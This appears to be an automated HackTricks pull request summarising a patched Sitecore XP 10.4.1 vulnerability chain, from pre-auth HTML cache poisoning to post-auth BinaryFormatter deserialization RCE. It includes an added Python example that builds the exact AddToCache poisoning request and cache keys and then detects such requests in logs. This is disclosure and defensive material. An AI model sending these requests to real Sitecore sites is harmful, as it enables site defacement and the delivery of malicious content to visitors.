
carlospolop
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

🎯 Content Summary

Sitecore XP 10.4.1 Vulnerability Chain: Pre-auth HTML Cache Poisoning to Post-auth RCE

Target and Timeline

Target: Sitecore Experience Platform (XP) 10.4.1 rev. 011628. Research discloses three issues that chain from pre-auth HTML cache poisoning to post-auth RCE. Patches were released in June/July 2025 (KB1003667, KB1003734).


Vulnerabilities

  • WT-2025-0023 / CVE-2025-53693: Pre-auth HTML cache poisoning via uns...

    🔧 Technical Details

    Pre-auth cache poisoning via XAML reflection: Use /-/xaml/Sitecore.Shell.Xaml.WebControl where AjaxScriptManager accepts __SOURCE (clientID of xmlcontrol:GlobalHeader) and __PARAMETERS (e.g., AddToCache("key","<html>...</html>")). Because XmlControl extends Sitecore.Web.UI.WebControl, ReflectionUtil.Filter allows invoking WebControl.AddToCache, granting arbitrary HTML cache writes without auth.

    Enumerating cache keys: If /sitecore/api/ssc (ItemService) is exposed, query /item/search to list cacheable items, their VaryBy* flags, and item paths. Enumerate device names via _templatename:Device. Construct exact keys: {Path}_#lang:{LANG}[_#dev:{DEVICE}][_#login:{T|F}]...[_#index] and poison precisely.

    Side-channel enumeration under...

    🤖 Agent Actions

    Actions taken:

    1. Explored the repository to find the best fit for the content:
    • Web cache poisoning material belongs under Pentesting Web -> cache-deception.
    • The deserialization sink belongs under Pentesting Web -> Deserialization (.NET).
    • Sitecore is a distinct CMS/tech with existing precedents (Drupal/Joomla/etc.) under network-services-pentesting/pentesting-web, so a new Sitecore page was created and linked from the main “Pentesting Web Methodology” page.
    2. Created a new dedicated Sitecore page capturing the full chain and techniques:
    • File created: src/network-services-pentesting/pentesting-web/sitecore/README.md
    • Content included:
      • Pre-auth HTML cache poisoning primitive via XAML AjaxScriptManager reflection calling Sitecore.Web.UI.WebControl.AddToCache(cacheKey, html)
      • PoC request using __SOURCE and __PARAMETERS and where to aim (xmlcontrol:GlobalHeader clientID)
      • Cache key construction with VaryBy* fields and an example key to target precisely
      • Enumerating cacheable items and device names using /sitecore/api/ssc/item/search and the side-channel via TotalCount under restricted users
      • Post-auth RCE via convertToRuntimeHtml → ConvertWebControls → Sitecore.Convert.Base64ToObject (BinaryFormatter.Deserialize)
      • End-to-end trigger steps via EditHtml → FixHtml dialog with the required HTML layout (iframe id + sibling id “_inner” with base64 gadget)
      • Detection and hardening checklist
      • References (watchTowr blog and Sitecore KBs)
    • Cross-references:
      • Linked to generic cache poisoning content
      • Linked to Deserialization overview and the .NET page
    3. Linked Sitecore in the main web tech tricks list:
    • Modified: src/network-services-pentesting/pentesting-web/README.md
    • Added bullet entry: Sitecore (sitecore/index.html) in “Web tech tricks”
    4. Augmented the generic Web Cache Poisoning page with the Sitecore-specific technique and link:
    • Modified: src/pentesting-web/cache-deception/README.md
    • Added a concise “Sitecore pre-auth HTML cache poisoning (unsafe XAML Ajax reflection)” subsection:
      • Included minimal PoC and an explanation that it enables arbitrary HtmlCache writes
      • Pointed to the full Sitecore page via {{#ref}}
      • Added watchTowr blog link into the References section for added context
    5. Added a real-world .NET sink section for Sitecore BinaryFormatter usage:
    • Modified: src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
    • New section: “Real‑world sink: Sitecore convertToRuntimeHtml → BinaryFormatter”
      • Summarized the sink API and pipeline path (convertToRuntimeHtml → ConvertWebControls → Base64ToObject)
      • Minimal authenticated trigger flow (EditHtml → FixHtml with iframe/sibling id convention)
      • Reference to the dedicated Sitecore page for full chain
      • Added watchTowr blog link in this page’s References

    Files changed/created:

    • Created: src/network-services-pentesting/pentesting-web/sitecore/README.md
    • Modified: src/network-services-pentesting/pentesting-web/README.md (added Sitecore entry)
    • Modified: src/pentesting-web/cache-deception/README.md (added Sitecore technique subsection, and reference)
    • Modified: src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md (added Sitecore sink, and reference)

    Why this placement:

    • The Sitecore chain contains a product-specific pre-auth cache poisoning primitive, API enumeration patterns, and a product-specific BinaryFormatter sink. A dedicated Sitecore page under network-services-pentesting/pentesting-web matches existing CMS/tech organization and avoids bloating generic pages.
    • Generic cache-poisoning page received a short, self-contained “real-world” reference and PoC (minimal duplication) plus a link to the Sitecore detail page.
    • .NET deserialization page gained a concise “real-world” sink example pointing to the detailed Sitecore chain, improving practical applicability of the .NET material.

    References added:

    • watchTowr Labs – Cache Me If You Can: Sitecore Experience Platform Cache Poisoning to RCE
    • Sitecore KB1003667, KB1003734

    Notes:

    • All internal references via {{#ref}} use verified relative paths.
    • Maintained HackTricks style (banners, structure, code blocks, concise technical language).
    • No unrelated sections were created; Sitecore is discoverable from the main pentesting web methodology list and cross-linked from relevant generic technique pages.

    This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

    🗑️ File Cleanup

    • searchindex.js removed: This auto-generated file has been removed to prevent conflicts.
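The cache-key format and the AjaxScriptManager request described in the Technical Details above (`{Path}_#lang:{LANG}[_#dev:{DEVICE}][_#login:{T|F}]`, `__SOURCE` = clientID of `xmlcontrol:GlobalHeader`, `__PARAMETERS` = `AddToCache("key","<html>")`), together with a detection pass over request logs for the items in the PR's detection checklist, as an added example. This is not code from the PR, from HackTricks or from the watchTowr post. Assumptions: the poisoning request is sent as a form-encoded POST (the PR shows only the two parameters), the GlobalHeader clientID value is a placeholder that must be taken from the real page, and the log format and sample log lines are constructed for this example.

```python
"""Added example (not from the PR or the watchTowr post). Builds the Sitecore
HtmlCache key format and the AjaxScriptManager AddToCache request as the PR
summary describes them, then flags matching requests in constructed log lines.
Assumptions: form-encoded POST transport, placeholder clientID, custom log format."""
import re
from urllib.parse import unquote_plus, urlencode

XAML_ENDPOINT = "/-/xaml/Sitecore.Shell.Xaml.WebControl"
ITEM_SEARCH_ENDPOINT = "/sitecore/api/ssc/item/search"
# Placeholder: the real value is the clientID rendered for xmlcontrol:GlobalHeader.
GLOBAL_HEADER_CLIENT_ID = "GLOBALHEADER_CLIENTID_PLACEHOLDER"


def build_cache_key(path, lang, device=None, login=None, index=False):
    """Assemble an HtmlCache key from the VaryBy* pattern quoted in the PR:
    {Path}_#lang:{LANG}[_#dev:{DEVICE}][_#login:{T|F}][_#index].
    Sitecore has further VaryBy* segments that the PR text elides; they
    would follow the same '_#name:value' convention."""
    key = f"{path}_#lang:{lang}"
    if device is not None:
        key += f"_#dev:{device}"
    if login is not None:
        key += f"_#login:{'T' if login else 'F'}"
    if index:
        key += "_#index"
    return key


def build_poison_request(client_id, cache_key, html):
    """Return the request that makes AjaxScriptManager reflect into
    WebControl.AddToCache: __SOURCE names the GlobalHeader control,
    __PARAMETERS carries the AddToCache("key","<html>") call.
    Form-encoded POST is an assumption; the PR only lists the parameters."""
    call = 'AddToCache("%s","%s")' % (cache_key, html)
    body = {"__SOURCE": client_id, "__PARAMETERS": call}
    return {"method": "POST", "path": XAML_ENDPOINT, "body": urlencode(body)}


# ---- detection over request logs -------------------------------------------
# Constructed log format: ip user "METHOD target" status body="<urlencoded body>"
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<user>\S+) "(?P<method>[A-Z]+) (?P<target>\S+)" '
    r'(?P<status>\d{3}) body="(?P<body>.*)"$'
)
_ADD_TO_CACHE_RE = re.compile(r'AddToCache\("([^"]*)"')


def find_cache_poison_attempts(log_lines):
    """Flag (a) hits on the XAML reflection endpoint whose __PARAMETERS call
    AddToCache and (b) ItemService searches enumerating devices. Unparseable
    lines are skipped rather than raising, so a noisy log does not abort."""
    findings = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        query, body = unquote_plus(query), unquote_plus(m.group("body"))
        base = {"ip": m.group("ip"), "user": m.group("user")}
        if path == XAML_ENDPOINT and "__PARAMETERS=" in body and "AddToCache(" in body:
            key = _ADD_TO_CACHE_RE.search(body)
            findings.append({**base, "reason": "xaml_addtocache",
                             "cache_key": key.group(1) if key else None})
        elif path == ITEM_SEARCH_ENDPOINT and "_templatename:Device" in query:
            findings.append({**base, "reason": "ssc_device_enum", "cache_key": None})
    return findings


# Constructed sample log lines (not real traffic).
SAMPLE_LOGS = [
    '203.0.113.5 - "POST /-/xaml/Sitecore.Shell.Xaml.WebControl" 200 '
    'body="__SOURCE=GLOBALHEADER_CLIENTID_PLACEHOLDER&__PARAMETERS='
    'AddToCache%28%22%2Fsitecore%2Fcontent%2FHome_%23lang%3Aen%22%2C%22%3Chtml%3E...%22%29"',
    '203.0.113.5 - "GET /sitecore/api/ssc/item/search?term=_templatename%3ADevice" 200 body=""',
    '198.51.100.7 admin "GET /sitecore/shell/default.aspx" 200 body=""',
]

if __name__ == "__main__":
    key = build_cache_key("/sitecore/content/Home", "en", device="Default", login=False)
    print(build_poison_request(GLOBAL_HEADER_CLIENT_ID, key, "<b>poisoned</b>"))
    for f in find_cache_poison_attempts(SAMPLE_LOGS):
        print(f)
```

The detector keys on the endpoint plus the `AddToCache(` call rather than on the `__SOURCE` value, because the clientID varies per deployment while the reflected method name does not; a `xaml_addtocache` finding with an anonymous user is exactly the pre-auth write the PR describes, and the extracted `cache_key` tells you which rendering to purge.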

…ache Pois...

- Remove searchindex.js (auto-generated file)
@carlospolop
Collaborator Author

🔗 Additional Context

Original Blog Post: https://labs.watchtowr.com/cache-me-if-you-can-sitecore-experience-platform-cache-poisoning-to-rce/

Content Categories: Based on the analysis, this content was categorized under "Pentesting Web -> Web Cache Poisoning (with cross-reference to .NET Deserialization/BinaryFormatter) or a new CMS subpage: Pentesting CMS -> Sitecore".

Repository Maintenance:

  • MD Files Formatting: 879 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0
